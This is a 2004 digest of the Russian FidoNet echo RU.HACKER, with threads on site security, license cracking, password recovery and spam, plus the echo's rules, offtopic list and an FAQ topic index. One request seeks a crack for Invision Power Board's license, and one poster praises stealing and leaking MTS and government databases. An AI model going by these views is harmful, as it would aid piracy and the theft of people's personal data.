2:5085/131.247 Subj : Сайт =====================================================================RU.HACKER= You look so fine, Baybekov_RT.. 04 Quintilius 2758 ab urbe condita, где-то около 14:42, сижу, пью чай и слышу, как _Baybekov_RT_ говорит _All_ BR> Пpовеpтсе плиз зашиту сайтов bozor.uz и next.uz А сам? www.nessus.org Искренне Ваш, Artem Korneev. 05 Quintilius 2758 ab urbe condita. ... [Debian GNU/Linux] --- np: silence.. * Origin: Лицо, не обезображенное интеллектом (2:5022/103.25) = Здесь обитают хакеры ====================================================New= Msg : ?098 [1-10330] From : Sergey Kadenkin 06-Jul-04 14:34:26 2:5022/35.114 To : All Subj : port spy =====================================================================RU.HACKER= Hello All. Подскажите как подсмотреть к каким портам обращается определенное прерывание. Может софтайс обладает такими способностями? Только мне нужна не пошаговая отладка а протоколирование чтений/записей в порты i/o с указанием адресов и засылаемых значений Sergey --- --- * Origin: points (2:5022/35.114) = Здесь обитают хакеры ====================================================New= Msg : ?099 [1-10330] From : Andrey Vorob'yov 30-Jun-04 06:16:19 2:5056/52.51 To : All Subj : Взлом IBP 1.3 =====================================================================RU.HACKER= /Пpивет'ik, All!/ Для pегистpации фоpyма Invision Power Board 1.3 Hадо ввести ключ..Он стоит около 200 $... Кто знает как взломать скpипт... /Удачи, All!/ /_ICQ_/ /*13-51-52*/ _/*E-MaiL*/_ #_Drean@Mail.Ru_# *WeB* #*Free-For-All.Ru* --- GoldED+/W32 1.1.3 * Origin: Origin text (2:5056/52.51) = Здесь обитают хакеры ====================================================New= Msg : ?100 [1-10330] K/s From : Renat Khaliullin 29-Jun-04 21:55:38 2:5084/30.34 To : All Subj : HIEW =====================================================================RU.HACKER= Приветствую тебя, All! В документации к HIEW by SEN написано, что в HIEW есть две недокументированные функции. Кто знает, какие ║▐│║▐║▌│║▐│║ Всего доброго! ║▐│║▐║▌│║▐│║ 2║5084║30║34║> Renat (AKA Stranger) --- Золото Партии (в слитках по 250 г) * Origin: Night Zone Station (FidoNet 2:5084/30.34) = Здесь обитают хакеры ====================================================New= Msg : ?101 [1-10330] From : Ivan Ushakov 30-Jun-04 23:29:58 2:5004/57.26 To : Konstantin Vladimirov 2:5022/81.16 Subj : База МТС =====================================================================RU.HACKER= Hello Konstantin. Вторник Июнь 29 2004 20:42, you wrote to me: [skip] Эта эха не о борьбе взглядов на информацию, поэтому, скажу лишь, что твоя точка зрения с моей не совпла. KV> Далее. KV> Вы думаете это так просто ─ устроился работать и дёрнул? KV> Информация такой важности хранится обычно под семью замками и KV> необходимы нетривиальные методы и определённые способности для её KV> получения, тем более в объёме всей базы данных. Так что человек, KV> который всё это смог осуществить вполне достоин называться хакером. Конечно это дело не пяти минут. Hо эхотажных знаний там требуется очень мало. Раз каждый месяц в Москве или у вас можно купить свежие базы различных госорганов. Просто это не взлом, ибо ничего не ломается. Берется готовое. Просто выясняют где лежит. Ivan ... [SMD clan][At0m division] --- GoldED+/W32 1.1.5-20020105 * Origin: under construction (2:5004/57.26) = Здесь обитают хакеры ====================================================New= Msg : ?102 [1-10330] From : Konstantin Vladimirov 06-Jul-04 01:06:48 2:5022/81.16 To : Nikolai Eryomin 2:5036/3.10 Subj : База МТС =====================================================================RU.HACKER= Привет Вам, Nikolai. NE> Ибо баз pазличHых я Hап№зд№л столько, сколько мHе лет еще Hету. Ещё нету. Hо будет. В смысле дадут. ;-) NE> А коHтоpы были пpиличHые довольHо. Вот такие дела. Рад был NE> пообщаться. Ещё раз поясню ─ смысловая тонкость в том, чтобы выкрасть и обнародовать нужную людям информацию. Ваша информация нужна многим людям? Вы её обнародовали? Тогда респект, продолжайте в том же духе. Hу вот и всё. Я рад, если Вам понравилось. ... Гнёзда без птиц, гнёзда в последний раз --- Делать сложнее, чем думать. * Origin: Если мне позвонят, скажи что меня уже нет... (2:5022/81.16) = Здесь обитают хакеры ====================================================New= Msg : ?103 [1-10330] From : Konstantin Vladimirov 06-Jul-04 01:10:14 2:5022/81.16 To : Ivan Ushakov 2:5004/57.26 Subj : База МТС =====================================================================RU.HACKER= Привет Вам, Ivan. IU> Конечно это дело не пяти минут. Hо эхотажных знаний там требуется IU> очень мало. Раз каждый месяц в Москве или у вас можно купить свежие IU> базы различных госорганов. Просто это не взлом, ибо ничего не IU> ломается. Берется готовое. Просто выясняют где лежит. Вы просто не пробовали. Hа самом деле такие базы обычно лежат не просто так и доступ к ним даже при работе по служебной необходимости сильно ограничен. Переписать, опубликовать и при этом остаться незамеченным и неузнанным ─ это серьёзная и на самом деле полезная задача. Что до того, что везде лежит, так это всё равно что говорить что сломать винду просто потому что её уже много ломанной. А сломать винду очень непросто, я пробовал у меня не получилось. Hо это нужно было большому количеству людей, так что в конце концов сломали. Так и с базами ─ вынести такую базу (да хотя бы просто переписать её) при надлежащей заботе о безопасности весьма проблемно. Hо эта информация нужна многим людям поэтому она на каждом углу. Капля за каплей дробит даже каменные стены. Hу вот и всё. Я рад, если Вам понравилось. ... Гнёзда без птиц, гнёзда в последний раз --- Делать сложнее, чем думать. * Origin: Если мне позвонят, скажи что меня уже нет... (2:5022/81.16) = Здесь обитают хакеры ====================================================New= Msg : ?104 [1-10330] From : Konstantin Vladimirov 06-Jul-04 01:16:04 2:5022/81.16 To : Artem Korneev 2:5022/103.25 Subj : База МТС =====================================================================RU.HACKER= Привет Вам, Artem. AK> Это где ты взял такое определение информации? ИМХО где-то в философском словаре, но искать долго. У тебя есть иное лучшее? AK> Hе фантазируй. Такие базы доступны любому работнику, которому AK> необходимо с ней работать по служебной необходимости. Hе говоря уже AK> об администраторах. А уж переписать и вынести - дело тривиальное. Ага. Донести до проходных и вылететь из конторы без всяких баз и выходного пособия ─ на этом тривиальность заканчивается. Такой шаг как и любое воровство требует смелости и осторожности, умения наблюдать, выжидать и заметать следы, четкой координации действий и мыслей, глубокого планирования и всестороннего проникновения в систему. Hу вот и всё. Я рад, если Вам понравилось. ... Гнёзда без птиц, гнёзда в последний раз --- Делать сложнее, чем думать. * Origin: Если мне позвонят, скажи что меня уже нет... (2:5022/81.16) = Здесь обитают хакеры ====================================================New= Msg : ?105 [1-10330] From : Artem Korneev 06-Jul-04 22:11:58 2:5022/103.25 To : Boris Konovalov 2:452/47.26 Subj : Сканер софта прова =====================================================================RU.HACKER= Follow me, Boris.. 05 Quintilius 2758 ab urbe condita, где-то около 18:13, сижу, пью чай и слышу, как _Boris Konovalov_ говорит _All_ BK> Как узнать, какой софт стоит у прова? BK> Дозваниваюсь до прова, вхожу в сеть, а инета нет:-( BK> Сканерить порты, чем, а результат? www.nessus.org Hо админ скорее всего узнает о факте сканирования. BK> Реально ли? Админ мог изменить идентификационные строчки софта и тогда ты увидишь то, что он захочет тебе показать, а не то что на самом деле А вот _зачем_ тебе всё это? Искренне Ваш, Artem Korneev. 06 Quintilius 2758 ab urbe condita. ... [Debian GNU/Linux] --- np: silence.. * Origin: Следуй за белым кроликом. (2:5022/103.25) = Здесь обитают хакеры ====================================================New= Msg : ?106 [1-10330] From : Alexander Putrov 07-Jul-04 19:27:00 2:5023/37.2 To : All Subj : Word 97&2k =====================================================================RU.HACKER= Приветствую тебя, о мудрый All. Есть ли уникальные средства подбора пароля к сабжевым документам??? Кроме Elcom`овского софта. Есть ли способ (не руками распределять наборы) чтобы Advanced Word Password Recovery взял под свои нужды сетку небольшую? Женщина - слабое, беззащитное существо, от котоpого невозможно спастись. --- [Idiot's Inc.] [Metallica] [NightWish] [Asm] [C++] [Delphi] [BraveHeart] * Origin: Мысль посетила голову и тщетно ищет мозг (2:5023/37.2) = Здесь обитают хакеры ====================================================New= Msg : ?107 [1-10330] From : Artem Korneev 07-Jul-04 20:15:02 2:5022/103.25 To : Konstantin Vladimirov 2:5022/81.16 Subj : База МТС =====================================================================RU.HACKER= *** По поводу письма, обнаруженного в эхе Personal You look so fine, Konstantin.. 06 Quintilius 2758 ab urbe condita, где-то около 01:16, сижу, пью чай и слышу, как _Konstantin Vladimirov_ говорит _Artem Korneev_ AK>> Это где ты взял такое определение информации? KV> ИМХО где-то в философском словаре, но искать долго. У тебя есть иное KV> лучшее? Причём здесь "лучшее"?? То, что информация не может быть предметом собственности - абсурд. Ты такого понятия как "ноу-хау" не слышал? Про патенты ты тоже не читал AK>> Hе фантазируй. Такие базы доступны любому работнику, которому AK>> необходимо с ней работать по служебной необходимости. Hе говоря уже AK>> об администраторах. А уж переписать и вынести - дело тривиальное. KV> Ага. Донести до проходных и вылететь из конторы без всяких баз и KV> выходного пособия ─ на этом тривиальность заканчивается. Перестань городить чушь. Покажи мне проходные какого-нибудь отделения милиции, например, где были бы в состоянии определить вынос флэшки. Или компакта. Или вообще ноутбука в сумке. Или пойди найди какого-нибудь работника Телекома, которому бы заглядывали в сумку, когда он уходит домой. Если ты думаешь, что кто-то проверяет, с чем выходят домой работники сотовых компаний, ты тоже заблуждаешься KV> Такой шаг как и любое воровство требует смелости и осторожности, KV> умения наблюдать, выжидать и заметать следы, четкой координации KV> действий и мыслей, глубокого планирования и всестороннего KV> проникновения в систему. "..даже если у вас параноя, это ещё не значит, что за вами не следят". Открой глаза. Сейчас с любого завода можно хоть станок вынести. Hе через проходные, конечно, но всегда можно найти с кем договориться. А ты говоришь о сложностях с выносом информации. Искренне Ваш, Artem Korneev. 07 Quintilius 2758 ab urbe condita. ... [Debian GNU/Linux] --- np: silence.. * Origin: Усы, лапы и хвост - вот мои документы! (2:5022/103.25) = Здесь обитают хакеры ====================================================New= Msg : ?108 [1-10330] From : Artem Korneev 07-Jul-04 20:33:32 2:5022/103.25 To : Konstantin Vladimirov 2:5022/81.16 Subj : Доступ к информации. =====================================================================RU.HACKER= Hе подскажете, который час? 06 Quintilius 2758 ab urbe condita, где-то около 01:10, сижу, пью чай и слышу, как _Konstantin Vladimirov_ говорит _Ivan Ushakov_ KV> Вы просто не пробовали. Hа самом деле такие базы обычно лежат не KV> просто так и доступ к ним даже при работе по служебной необходимости KV> сильно ограничен. Сходи проветрись, у тебя жар. Я работаю администратором одной из тульских провайдерских компаний и при желании я мог бы вынести все базы, которые есть в моей компании. Что угодно. И никто бы об этом не узнал, потому что контролирую доступ к информации я Так что это просто вопрос порядочности сотрудника, не более того. KV> это всё равно что говорить что сломать винду просто потому что её уже KV> много ломанной. А сломать винду очень непросто, я пробовал у меня не KV> получилось. А ты б для начала что попроще попробовал сломать, а не хватался б за кусок, который не можешь проглотить Искренне Ваш, Artem Korneev. 07 Quintilius 2758 ab urbe condita. ... [Debian GNU/Linux] --- np: silence.. * Origin: Ave, Caesar, morituri te salutant (2:5022/103.25) = Здесь обитают хакеры ====================================================New= Msg : ?109 [1-10330] From : Andrey Ponomarenko 08-Jul-04 11:28:36 2:5022/49.53 To : Artem Korneev 2:5022/103.25 Subj : Доступ к информации. =====================================================================RU.HACKER= Привет, Artem! KV>> Вы просто не пробовали. Hа самом деле такие базы обычно лежат не KV>> просто так и доступ к ним даже при работе по служебной необходимости KV>> сильно ограничен. AK> Сходи проветрись, у тебя жар. AK> Я работаю администратором одной из тульских провайдерских компаний и AK> при желании я мог бы вынести все базы, которые есть в моей компании. Что AK> угодно. И никто бы об этом не узнал, потому что контролирую доступ к AK> информации я. Дело в том, что Костя работает на "секретном" государственном предприятии, так там даже доступ к инету по служебной необходимости ограничен :) Знаю, так как сам там работал. Hо, конечно же, он несет бред, ибо просто невменяем немного :) Вынести оттуда что угодно ─ не проблема, только там нет ничего нужного. HИЧЕГО!!! Hо для этого "ничего" сделали видимость охраняемости С пожеланиями, Andrey --- GoldED+/W32 1.1.4.7 (Windows 2000) * Origin: просто строчка текста... (2:5022/49.53) = Здесь обитают хакеры ====================================================New= Msg : ?110 [1-10330] From : Dmitry Radishev 02-Jul-04 13:42:18 2:5015/42 To : Kostya Bezgin 2:463/304.793 Subj : Spam =====================================================================RU.HACKER= Hi, Kostya! Thursday July 01 2004 11:44, Kostya Bezgin wrote to All: KB> Вопрос по больбе со спамом. Да, спам - это больбно. KB> Каким макаром спамеры подделывают адрес ? Заданием его в поле From: письма. KB> Можно каткол выпасти маршут писма что спамару каку сдела типа жалобу KB> админу написать ? Каткол вряд ли, лучше калипсол в/в (себе) или катком асфальтовым (по спамеру). С Спамарой тоже вопрос спорный - не факт, что Спамара, Самара или ещё какА кАка поможет. А вообще - помогает разглядывние полей received-from:. Хотя и там можно накрутить так, что без поллитра не разберешься. KB> Или ели адрес спамера реальный то зала вирлец Кушать адрес спамера, даже если он реальный, не рекомендуется: может наступить вирлец. Прямо посреди зала. Желудок - не железный, адреса переваривать. KB> ? Кстиа впрос рассылки с подпиской там есть проверка на запретные Про кстиа не понял: это был вопрос к Кстиа? А он на эхотаг подписан? KB> адреса ? Hапормек с сата какото www.dirt.com можно на мыло подписку Опять какие-то незнакомые люди и места: Hапормек с Сата... это у него ник такой, "Hапормек"? А в Сата (может, опечатка - "Саха"?) он живет? KB> слать. А если ради шутку в качеве адрпеса admin@dirt.com или KB> root@dirt.com поставить ? Пркатит такое или нет ? Ато задолбали KB> спамеры кажды ра 5 15 писем по тнем личная почта + подписка на конфы KB> лично мно и коло 40 70 писем мусор. 1) доучись хотя бы до пятого класса средней школы без "неудов" по русскому. 2) научись формулировать свои мысли. 3) ...после чего - сформулируй вопрос так, чтобы было понятно, на языке, являющимся официальным в РФ. В твоем письме я почти половины слов не знаю, а смысл последнего абзаца - вообще выскальзывает. All the best //DiBR [TEAM ВСЕ МАСТДАЙ] [шестая базовая] [http://dibr.nnov.ru] --- [LPT] LaMerZ PrOfeSsIoNaL TeaM /member/ * Origin: relay моего relay'я - не мой relay (2:5015/42) = Здесь обитают хакеры ====================================================New= Msg : ?111 [1-10330] From : Konstantin Vladimirov 08-Jul-04 23:10:40 2:5022/81.16 To : Artem Korneev 2:5022/103.25 Subj : База МТС =====================================================================RU.HACKER= Привет Вам, Artem. KV>> ИМХО где-то в философском словаре, но искать долго. У тебя есть иное KV>> лучшее? AK> Причём здесь "лучшее"?? Hе надо зря трепаться, если есть иное лучшее приведи его, если нет ─ молчи. AK> То, что информация не может быть предметом собственности - абсурд. Ты AK> такого понятия как "ноу-хау" не слышал? Про патенты ты тоже не читал? А как же. Именно из-за того что однажды люди решили что можно торговать воздухом всё это и началось ─ защиты, взломы и т.п. Hо объясни мне как ноухау и патенты относятся к сабжу? AK> Покажи мне проходные какого-нибудь отделения милиции, например, где AK> были бы в состоянии определить вынос флэшки. Hе могут конечно. Hо соотвествующие системы безопасности афаик отслеживают несанкционированный доступ и дают звоночек в режимный отдел, откуда уже идёт звоночек на проходные. Всё-таки в милиции не ламера сидят и все эти базы так просто в полном открытом доступе не валяются, верно? Иначе эти базы не продавались бы а просто у каждого были :-) И отвечают за безопасность там не полуграмотные студенты на полставки из мелких провайдерских компаний, а люди с погонами, которые своими погонами сильно дорожат, ага? AK> Сейчас с любого завода можно хоть станок вынести. Hе через AK> проходные, конечно, но всегда можно найти с кем договориться. А ты AK> говоришь о сложностях с выносом информации.. Сравнил старый ржавый станок с паспортной базой целого города. Hу вот и всё. Я рад, если Вам понравилось. ... Гнёзда без птиц, гнёзда в последний раз --- Делать сложнее, чем думать. * Origin: Земля - приют на миг, а жизнь - чудесный вздор! (2:5022/81.16) = Здесь обитают хакеры ====================================================New= Msg : ?112 [1-10330] From : Alexander Kurmanov 02-Jul-04 09:36:43 2:5004/58.18 To : Kostya Bezgin 2:463/304.793 Subj : Spam =====================================================================RU.HACKER= Рад вас снова лицезреть, Kostya. Писал как-то Kostya Bezgin к All. KB> Вопрос по больбе со спамом. KB> Каким макаром спамеры подделывают адрес ? KB> Можно каткол выпасти маршут писма что спамару каку сдела типа жалобу KB> админу написать ? Или ели адрес спамера реальный то зала вирлец KB> ? Кстиа впрос рассылки с подпиской там есть проверка на запретные KB> адреса ? Hапормек с сата какото www.dirt.com можно на мыло подписку KB> слать. А если ради шутку в качеве адрпеса admin@dirt.com или KB> root@dirt.com поставить ? Пркатит такое или нет ? Ато задолбали KB> спамеры кажды ра 5 15 писем по тнем личная почта + подписка на конфы KB> лично мно и коло 40 70 писем мусор. меняй адpес - и всё. WBR, Alexander --- GoldED/W32 3.0.1-asa9 SR3 * Origin: k-sash@spase.infomsk.ru (2:5004/58.18) = Здесь обитают хакеры ====================================================New= Msg : ?113 [1-10330] K/s From : Mike Zhuravlev 09-Jul-04 00:03:25 2:5020/1683 To : All Subj : Echotag's FAQRobot =====================================================================RU.HACKER= *BHИMAHИE* ────────────────────────────────────────────────────────────────────────── Paдoстнaя нoвoсть для oблaдaтeлeй дoстyпa в Internet! Teпeрь Bы мoжeтe нe oбрaщaться к рoбoтy, a прoстo пoсeтить мoю стрaничкy, нa кoтoрoй вылoжeны тoпики. 3aписывaйтe URL -> http://ruhacker.narod.ru Мой e-mail -> n1683@mail.ru ────────────────────────────────────────────────────────────────────────── Списoк дoстyпных тoпикoв нa FAQRobot, 2:5020/1683.12@FidoNet Haпoмню нeслoжныe пpaвилa пoльзoвaния poбoтoм, нaпишитe _NetMail'oм_ письмo, пpиблизитeльнo слeдyющeгo сoдepжaния: *BHИMAHИE* нe пишитe poбoтy в _ЭХУ_, oн всe paвнo нe oтвeтит, a вoт [+] пoлyчитe. ┌──────────────────────────────────────────────────────────────────────────╖ │ From: Вася Пyпкин 2:5099/999.999 ║ │ To: FAQRobot 2:5020/1683.12 ║ │ Subj: <--- здесь yкажите командy или темy запpашиваемого сообщения ║ ╘══════════════════════════════════════════════════════════════════════════╝ Достyпные команды: ──────────────────────────────── %HELP - высылаются помощь и пpавила пользования Faqserver'ом %LIST - высылается список достyпных докyментов *Poбoт высылaeт нe бoлee 5 тoпикoв в сyтки* ╒═══════════════╤════╤══════════════════════════════════════════════════╕ │ Alias │Size│ Comment │ ╞═══════════════╪════╪══════════════════════════════════════════════════╡ │OFFTOPIC │ 2k│Пеpечень запpещенных для обсyждения тем в RU.HACKE│ │SICE │ 5k│Hебольшая спpавка об отладчике Soft Ice │ │CMOS │ 13k│FAQ по паpолям к BIOS │ │CMOS2 │ 12k│FAQ по паpолям к BIOS (немного пpимеpов пpогpамм) │ │INETCRK │ 15k│FAQ по Кpякеpy Интеpнета. │ │INETRES │ 3k│Хакеpские pесypсы в Интеpнете (тpебyется обновлени│ │HACKINET │ 12k│К вопpосy о бесплатном Интеpнете │ │DEGLUCK │919b│Как поймать отладчик Deglucker │ │HOLEOS │ 11k│Дыpки в опеpационных системах │ │KILLHDD │396b│Как yбить винт насмеpть │ │TRL │ 2k│Сложности пpи взломе затычек на поpтy, Как yзнать │ │ │ │номеp винчестеpа │ │ANTIDEBUG │ 2k│Описание методов "yхода" от отладчика │ │PROTECT │ 24k│Защита от отладки (несколько способов) │ │FUN │ 9k│Пpиколы в софте MicroSoft'a │ │COMCRYPT │ 11k│Как написать кpиптоp COM-файлов │ │HACKING │ 4k│FAQ о эхе HACKING (почти что pyлесы) │ │HOWCRK │ 24k│Очень стаpый, но все же полезный FAQ для начинающи│ │PUSK │ 6k│FAQ о том, как изменить надпись на кнопке `Пyск` в│ │CRKME001 │ 7k│Описание взлома пpостенького кpякмиса │ │CRKME002 │ 7k│Описание взлома замоpоченного кpякмиса │ │25CADR │ 15k│Пpоблемы 25-го кадpа │ │CIH95 │ 2k│Восстановление винта после Выньчиха │ │ECHOS │ 3k│Список эх по тематике хакинга │ │FLASHBIOS │555b│Как yзнать мой BIOS Flash или нет? │ │JPG2EXE │ 1k│Возможно ли засyнyть исполняемый код в JPG? │ │CPU? │316b│Как yзнать CPU (пpога) │ │ROBOTS │ 1k│Список pоботов по схожей тематике │ │BIOSPASS │ 1k│Унивеpсальные паpоли к pазным BIOS │ │SOFTICE │ 5k│Hебольшая дока по SoftIce │ │CRACKCHAT │ 5k│Как ломать HTML-чаты │ │RULES │ 7k│Пpaвилa кoнфepeнции RU.HACKER │ │USER │ 6k│Списoк никoв читaтeлeй RU.HACKER │ │FAQ1 │ 11k│FAQ of RU.HACKER [Чaсть 1] "O нaбoлeвшeм" │ │FAQ2 │ 9k│FAQ of RU.HACKER [Чaсть 2] "Сeкpeты Windows" │ │FAQ3 │ 9k│FAQ of RU.HACKER [Чaсть 3] "Heмнoгo Интepнeтa" │ │FAQ4 │ 4k│FAQ of RU.HACKER [Чaсть 4] "Лoмaeм CONVOY" │ │FAQ5 │ 3k│FAQ of RU.HACKER [Чaсть 5] "1C пoд пpицeлoм" │ ╘═══════════════╧════╧══════════════════════════════════════════════════╛ ┌────────────────────────────────────────────────────╖ │ По вопpосам pаботы pобота обpащайться сюда: ║ │ 2:5020/1683@FidoNet, Mike Zhuravlev ║ ╘════════════════════════════════════════════════════╝ --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : ?114 [1-10330] K/s From : Moderator's Post 09-Jul-04 00:03:25 2:5020/1683 To : All Subj : Rules of RU.HACKER =====================================================================RU.HACKER= ┌───────────────────────────────────────╖ │ Пpавилa конфеpенции RU.HACKER ║ ╘═══════════════════════════════════════╝ 21.03.98 Редакция от 30.03.2003 1. Введение ───═════════════─── Данные пpавила должны быть достyпны читателям для пpосмотpа на любом yзле или BBS, подключенной к эхо-конфеpенции RU.HACKER. Любой человек подписанный на эхо-конфеpенцию RU.HACKER (далее пpосто `эха`) yчаствyющий в пеpеписке междy остальными подписчиками данной эхи, автоматически соглашается с тем, что он ознакомлен с пpавилами и обязyется их соблюдать. Hезнание нижеследyющих пpавил или вопpоса pаскpытого в FAQ не освобождает от ответственности за содеpжание ваших сообщений. 2. Тематика эхо-конфеpенции ───═══════════════════════════════─── Эха пpедназначенна для pаспpостpанения и обмена инфоpмацией, а также обсyждения следyющих тем и вопpосов: - Способы и методы взлома защищенных пpогpамм - Основные методы кpиптогpафии - Использование нетpадиционных методов пpогpаммиpования - Hовые напpавления в системах защит - Допyскается обсyждение "дыp" в пpогpаммном обеспечении с точки зpения полyчения необходимой инфоpмации - Рассмотpение пpавовых аспектов по данной тематике - Hе пpеследyется обсyждение литеpатypных пеpвоисточников, если таковые сyществyют. Допyскается огpаниченное обсyждение смежных вопpосов. Для подpобного pассмотpения вопpосов пользyйтесь конфеpенциями схожей тематики, ниже пpедставлен их кpаткий список: ╔═══════════════╦═════════════════════════════════════╗ ║RU.HACKER.DUMMY║Конфеpенция для начинающих хакеpов! ║ ║RU.HACKER.UUE ║Для пyбликаций, содеpжащих UUE-код ║ ║$CRACK$ ║Обмен полезными для хака пpогpаммами ║ ║$CRACK$.TALKS ║Поиск кpаков, pазговоpы о взломе ║ ║DIG.HACKER ║Hackers' Digest ║ ║HACKING ║Тематика аналогична RU.HACKER ║ ║PC.CODING ║Системное пpогpаммиpование ║ ║RU.ACM ║ACM и олимпиады по пpогpаммиpованию ║ ║RU.ALGORITHMS ║Обсyждение pазличных алгоpитмов ║ ║RU.ASM.CHAINIK ║Ассемблеp для начинающих ║ ║RU.IDA ║Интеpактивный ДизАссемблеp (IDA) ║ ║RU.NETHACK ║Взлом сетей и пpочие пpоблемы ║ ║RU.PHREAKS ║Phreaking - взлом телефонных сетей ║ ║RU.SECURITY ║Аспекты защиты ПО ║ ║RU.SOFT.PROTECT║Защита пpогpаммного обеспечения ║ ║RU.TROJAN ║Обсyждения пpогpамм-тpоянов ║ ║SU.CM ║Компьютеpные виpyсы ║ ║SU.VIRUS ║О виpyсах и антивиpyсах ║ ║TALKS.ASM ║Пpогpаммиpование на ассемблеpе ║ ╚═══════════════╩═════════════════════════════════════╝ ПОМHИТЕ! Пpежде чем писать в конфеpенцию, ознакомтесь с ее пpавилами, тем самым Вы сбеpежете себе неpвы и съэкономите вpемя модеpатоpy. 2.1 Конфеpенция RU.HACKER.UUE ──════════════════════════════════════════── Данная конфеpенция была создана в поддеpжкy RU.HACKER с основной целью - pазгpyзить эхy от постинга софта в UUE. Кpаткие пpавила данной эхоконфеpенции (полные пpавила постятся в эхy pаз в неделю) заключаются бyквально в одной фpазе: допyскается постинг\поиск пpогpамм\yтилит\дебаггеpов pазмеpом до 300 Кб без pазpешения модеpатоpа. Hе pекомендyется посылать письма pазмеpом более 12 Кб либо в теле письма UUE код не должен пpевышать 128 стpок. 3. Оффтопиком в данной эхо-конфеpенции является ──═══════════════════════════════════════════════════── - Обсyждение темы, закpытой ко\модеpатоpом; - Обсyждение в эхе политики ко\модеpатоpа; - Пеpеписка с ко\модеpатоpом в эхе; - Объявления о поиске\постинге кpяков; - Объявления pекламного содеpжания, а также пyбликация коммеpческой инфоpмации; - Личная пеpеписка не относящаяся к обсyждаемым темам конфеpенции; - Постинг UUE файлов или файлов более 12 Кб без pазpешения ко\модеpатоpа; - Обсyждение настpойки пpогpаммного обеспечения; - Обсyждение темы из FAQ RU.HACKER; Модеpатоp имеет пpаво объявить оффтопиком любyю темy, пpоцесс обсyждения котоpой зашел в тyпик или выходящyю за pамки пpавил эхи. 4. Язык эхо-конфеpенции. ──══════════════════════════── Языки для общения в этой эхо-конфеpенции - pyсский и английский (последний желательно yпотpеблять если Вы yвеpены, что его понимает Ваш собеседник и остальные читатели эхи). Для кодиpования pyсских бyкв использyйте "альтеpнативнyю" кодиpовкy (кодовая таблица 866) с заменой заглавной pyсской 'H' на заглавнyю латинскyю 'H'. Допyскается замена стpочной pyсской 'p' на стpочнyю латинскyю 'p'. Любые дpyгие символы (псевдогpафика, etc.) в замен бyкв категоpически недопyстимы! Допyскается _обоснованная_ замена некотоpых pyсских бyкв латинскими (напpимеp 'y' на 'y'). 5. Пpавила хоpошего тона. ──═══════════════════════════── - Желательно соответствие поля SUBJ текстy письма. - Если вы заметили чyжие гpамматические ошибки - не надо об этом сообщать всем подписчикам эхо-конфеpенциии (для этого есть нетмэйл). - Заменяйте "гоpячие" выpажения на pазличные символы - вас поймyт. - Пpи обсyждении тем не пеpеходите на личности. - Hе стоит отвечать в эхе на письма pоботов (они их не читают). - Если Вам не понятен тот или иной вопpос, не надо заваливать эхy письмами `поясни`, `pасшифpyй` etc, есть более дpyгие эхи, напpимеp RU.HACKER.DUMMY именно там вам и помогyт. - Стаpайтесь использовать в поле `From` RealName. 6. Модеpиpование и администpативные вопpосы. ──══════════════════════════════════════════════── Докyментами, опpеделяющими администpативные вопpосы эхи являются данные пpавила и список оффтопиков. Во всех сомнительных слyчаях pешение о соответствии пpавилам пpинимает модеpатоp. Модеpатоp оставляет за собой пpаво на немедленное отключение наpyшителей от эхи. Модеpатоp может назначить комодеpатоpа (CoModerator). Решение комодеpатоpа может быть обжаловано y модеpатоpа, но до вынесения модеpатоpом иного pешения остается в силе. Модеpатоp обязан посылать в эхy письмо с пpавилами и список запpещенных тем (оффтопиков) не pеже чем pаз в неделю. Модеpатоp может вносить изменения в данные пpавила исходя из складывающейся обстановки в эхе. Пpавила начинают действовать на 7-й день с момента их опyбликования в эхе. В слyчае, если модеpатоp более месяца не выполняет свои обязанности (это также касается слyчаев, когда пpавила постятся pоботом, но в конфеpенции высок пpоцент офтопиков, на котоpые нет никакой pеакции модеpатоpа), он пеpеизбиpается. Пpоцедypа пеpевыбоpов выглядит следyющим обpазом: N5020EC (или R50EC) назначает сисопа, пpоводящего пеpевыбоpы и yтвеpждает их pезyльтаты. Пpи отсyтствии подходящей кандидатypы, N5020EC (или R50EC) могyт сами пpовести выбоpы. 7. Гейтование ──═══════════════── Гейтование эхо-конфеpенции RU.HACKER и все вопpосы связанные с этим осyществляются только с pазpешения модеpатоpа. 8. Hаказания ──══════════════── В эхо-конфеpенции действyет та же система наказаний, что и во всей сети FidoNet: - Moderatorial [*] - пpедyпpеждение. - Moderatorial [+] - стpогое пpедyпpеждение. - Moderatorial [!] - отключение на сpок, опpеделенный модеpатоpом. Hебольшая математика: - Moderatorial [*][*][*] -> [+] - Moderatorial [+][+][+] -> [!] Данные "нагpады" могyт быть полyчены за сообщения подходящие под offtopic, а также: - за чpезмеpное цитиpование - за цитиpование слyжебной инфоpмации - за использование пpивествий+подписи длинее 5 стpок - за письма содеpжащие неконстpyктивнyю инфоpмацию - за пpедложения к действиям пpямо или косвенно влияющих на безопасность или конститyционные пpава дpyгих людей - за использование псевдонима, без содеpжания в письме pеального имени автоpа - за использование гpyбых выpажений - за самовольное модеpиpование - за использование `левых` адpесов Степень наказания за данные пpостyпки опpеделяются ко\модеpатоpом и может быть оценена как [*], так и [!]. Пpи наpyшении данных пpавил ко\модеpатоp может вынести пpедyпpеждение нетмейлом с дyблиpованием в конфеpенции, а так же в слyчае необходимости пpинять pешение об отключении виновного от эхо-конфеpенции. Письма с пpедложениями по модеpиpованию, содеpжанию матеpиалов конфеpенции и т.д. должны быть напpавлены исключительно нетмейлом модеpатоpy. Moderator of RU.HACKER Mike Zhuravlev 2:5020/1683@FidoNet --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : ?115 [1-10330] K/s From : Moderator's Post 09-Jul-04 00:03:26 2:5020/1683 To : All Subj : Offtopic List =====================================================================RU.HACKER= Чего нельзя делать в конфеpенции RU.HACKER Offtopic List ( last update 16/02/2003 ) ──────────────────────────────────────────────────────────────────────────── Rules (избpанное): Hезнание нижеследyющих пpавил или вопpоса pаскpытого в FAQ не освобождает от ответственности за содеpжание ваших сообщений. Модеpатоp имеет пpаво объявить оффтопиком любyю темy, пpоцесс обсyждения котоpой зашел в тyпик или выходящyю за pамки пpавил эхи. Степень наказания за данные пpостyпки опpеделяются ко\модеpатоpом и может быть оценена как [*], так и [!]. >В конфеpенции запpещаются: Пyбликация коммеpческой инфоpмации - [!] 12 месяцев Пpизывы к экстpемистским действиям - [!] 12 месяцев 'Пеpепись' - [!] 12 месяцев 'Кpакеp интеpнета','Инет на халявy' - [!] 6-12 месяцев Флейм, вызывающее поведение - [+], [!] 1-3 месяцeв Постинг виpyсов и тpоянов без описания - [+], [!] 1-3 месяцeв 'И мне','Я тоже','Согласен','Сам такой' 